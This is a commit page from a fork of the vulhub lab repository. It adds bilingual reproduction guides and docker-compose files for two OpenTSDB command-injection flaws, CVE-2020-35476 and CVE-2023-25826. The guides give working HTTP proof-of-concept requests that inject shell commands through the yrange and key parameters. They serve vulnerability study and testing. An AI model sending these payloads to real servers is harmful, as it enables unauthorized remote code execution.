aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
opentsdb/CVE-2020-35476/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 34 KiB

BIN
opentsdb/CVE-2020-35476/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 48 KiB

BIN
opentsdb/CVE-2020-35476/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 19 KiB

76
opentsdb/CVE-2020-35476/README.md Normal file
View File

@@ -0,0 +1,76 @@
# OpenTSDB Arbitrary Command Injection Remote Code Execution (CVE-2020-35476)
[中文版本(Chinese version)](README.zh-cn.md)
OpenTSDB is a distributed, scalable Time Series Database (TSDB) written on top of HBase.
A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)
References:
- https://github.com/OpenTSDB/opentsdb/issues/2051
- https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html
## Vulnerable Environment
Execute the following command to start a OpenTSDB server 2.4.0:
```
docker compose up -d
```
Once the service is started, visit `http://your-ip:4242` to see the web interface of the OpenTSDB.
## Exploit
You need to know the name of a metric before you can exploit this vulnerability on `http://your-ip:4242/api/suggest?type=metrics&q=&max=10`:
![](1.png)
However, the metrics list is empty.
Fortunately, the `tsd.core.auto_create_metrics` is set to `true` in this vulnerable OpenTSDB, so you can create a metric named `sys.cpu.nice` through following request:
```
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150
{
"metric": "sys.cpu.nice",
"timestamp": 1346846400,
"value": 20,
"tags": {
"host": "web01",
"dc": "lga"
}
}
```
If at least one metric exists and is not empty, the above request is not required.
Send following request, where the value of the parameter `m` must contain a valid metric name:
```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/success%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
```
![](2.png)
`touch /tmp/success` has been successfully executed.
![](3.png)

72
opentsdb/CVE-2020-35476/README.zh-cn.md Normal file
View File

@@ -0,0 +1,72 @@
# OpenTSDB 命令注入漏洞CVE-2020-35476
OpenTSDB是一款基于Hbase的、分布式的、可伸缩的时间序列数据库。在其2.4.0版本及之前,存在一处命令注入漏洞。
参考链接:
- https://github.com/OpenTSDB/opentsdb/issues/2051
- https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html
## 漏洞环境
执行如下命令启动一个OpenTSDB 2.4.0
```
docker compose up -d
```
服务启动后,访问`http://your-ip:4242`即可看到OpenTSDB的Web接口。
## 漏洞复现
利用这个漏洞需要知道一个metric的名字我们可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看metric列表
![](1.png)
我们这里的metrics是空的。
好在当前OpenTSDB开启了自动创建metric功能`tsd.core.auto_create_metrics = true`所以我们可以使用如下API创建一个名为`sys.cpu.nice`的metric并添加一条记录
```
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150
{
"metric": "sys.cpu.nice",
"timestamp": 1346846400,
"value": 20,
"tags": {
"host": "web01",
"dc": "lga"
}
}
```
如果目标OpenTSDB存在metric且不为空则无需上述步骤。
发送如下数据包,其中参数`m`的值必须包含一个有数据的metric
```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/success%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
```
![](2.png)
进入容器中可见`touch /tmp/success`已成功执行:
![](3.png)

6
opentsdb/CVE-2020-35476/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
version: '2'
services:
opentsdb:
image: vulhub/opentsdb:2.4.0
ports:
- "4242:4242"

BIN
opentsdb/CVE-2023-25826/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 226 KiB

BIN
opentsdb/CVE-2023-25826/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 178 KiB

71
opentsdb/CVE-2023-25826/README.md Normal file
View File

@@ -0,0 +1,71 @@
# OpenTSDB Arbitrary Command Injection Remote Code ExecutionCVE-2023-25826
[中文版本(Chinese version)](README.zh-cn.md)
OpenTSDB is a distributed, scalable Time Series Database (TSDB) written on top of HBase.
In version 2.4.1 and earlier, there is a command injection vulnerability. This vulnerability is actually due to an incomplete fix for CVE-2020-35476, so the entire reproduction process is similar to the previous one.
References:
- https://www.synopsys.com/blogs/software-security/opentsdb/
- https://github.com/OpenTSDB/opentsdb/pull/2275
## Environment
Execute the following command to start a OpenTSDB server 2.4.1:
```
docker-compose up -d
```
Once the service is started, visit `http://your-ip:4242` to see the web interface of the OpenTSDB.
## Exploit
Simialar as CVE-2020-35476, you need to know the name of a metric, visit `http://your-ip:4242/api/suggest?type=metrics&q=&max=10`to find out the metric list.
Due to the `tsd.core.auto_create_metrics` is set to `true` in this vulnerable OpenTSDB, you can create a metric named `sys.cpu.nice` through following request, if the metrics are empty:
```
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150
{
"metric": "sys.cpu.nice",
"timestamp": 1346846400,
"value": 20,
"tags": {
"host": "web01",
"dc": "lga"
}
}
```
If at least one metric exists and is not empty, the above request is not required.
Then the POC is different here, with the difference in the "key" parameter.
```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
```
![](1.png)
`touch /tmp/poc` has been successfully executed:
![](2.png)

70
opentsdb/CVE-2023-25826/README.zh-cn.md Normal file
View File

@@ -0,0 +1,70 @@
# OpenTSDB 命令注入漏洞CVE-2023-25826
OpenTSDB是一款基于Hbase的、分布式的、可伸缩的时间序列数据库。
2.4.1版本及之前,存在一处命令注入漏洞。
这个漏洞其实是对之前的CVE-2020-35476修复不完善导致的所以整个复现过程也与之前类似。
参考链接:
- https://www.synopsys.com/blogs/software-security/opentsdb/
- https://github.com/OpenTSDB/opentsdb/pull/2275
## 漏洞环境
执行如下命令启动一个OpenTSDB 2.4.1
```
docker-compose up -d
```
服务启动后,访问`http://your-ip:4242`即可看到OpenTSDB的Web接口。
## 漏洞复现
这之前的都和CVE-2020-35476一致也是需要知道一个metric的名字可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看metric列表。
如果metrics是空的由于当前OpenTSDB开启了自动创建metric功能`tsd.core.auto_create_metrics = true`所以也可以使用如下API创建一个名为`sys.cpu.nice`的metric并添加一条记录
```
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150
{
"metric": "sys.cpu.nice",
"timestamp": 1346846400,
"value": 20,
"tags": {
"host": "web01",
"dc": "lga"
}
}
```
如果目标OpenTSDB存在metric且不为空则无需上述步骤。
然后这里的poc就有所不同了这里可以看到绕过修复的一个点在参数key这里
```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
```
![](1.png)
进入容器中可见`touch /tmp/poc`已成功执行:
![](2.png)

6
opentsdb/CVE-2023-25826/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
version: '2'
services:
opentsdb:
image: vulhub/opentsdb:2.4.1
ports:
- "4242:4242"